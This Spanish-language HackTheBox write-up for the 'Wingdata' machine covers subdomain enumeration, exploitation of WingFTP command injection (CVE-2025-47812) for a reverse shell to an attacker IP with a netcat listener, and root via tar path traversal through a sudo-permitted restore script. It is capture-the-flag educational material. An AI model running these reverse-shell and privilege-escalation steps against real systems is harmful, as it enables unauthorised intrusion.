
Recorrido de HackTheBox Wingdata que cubre la inyección de comandos de WingFTP CVE-2025-47812 para el acceso inicial y la escalada de privilegios sudo mediante path traversal de tar hasta root.
Plataforma: HackTheBox | SO: Linux
La enumeración de VHost encuentra un servidor WingFTP. La inyección de comandos CVE-2025-47812 otorga acceso inicial. Root mediante un script de restauración de Python con sudo que extrae un archivo tar manipulado — el path traversal de tar escribe un archivo arbitrario como root.
nmap -sC -sV wingdata.htb -Pn
22/tcp open ssh OpenSSH
80/tcp open http wingdata.htb main site
Se añadió wingdata.htb a /etc/hosts. El puerto 80 hacía referencia a un dominio que indicaba virtual hosting.
ffuf -u http://wingdata.htb -H 'Host: FUZZ.wingdata.htb' \
-w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -ac
Encontrado: ftp.wingdata.htb — interfaz web del servidor WingFTP.
CVE-2025-47812 es una vulnerabilidad de inyección de comandos en la interfaz web de WingFTP Server. Un parámetro no saneado entrega una reverse shell.
nc -lvnp 4444
python3 exploit_CVE-2025-47812.py --target http://ftp.wingdata.htb --lhost <ATTACKER_IP> --lport 4444
Shell obtenida. Flag de usuario recuperada.
sudo -l
# (root) NOPASSWD: /usr/bin/python3 /opt/restore.py
/opt/restore.py acepta un archivo tar y lo extrae como root. tar no sanea las rutas — un archivo manipulado con ../ en el nombre del archivo escribe archivos fuera del directorio de extracción.
python3 craft_tar.py
sudo /usr/bin/python3 /opt/restore.py -b backup_888.tar
Shell de root obtenida. Flag de root en /root/root.txt.
Solo con fines educativos. Prueba únicamente sistemas que poseas o para los que tengas permiso explícito de probar.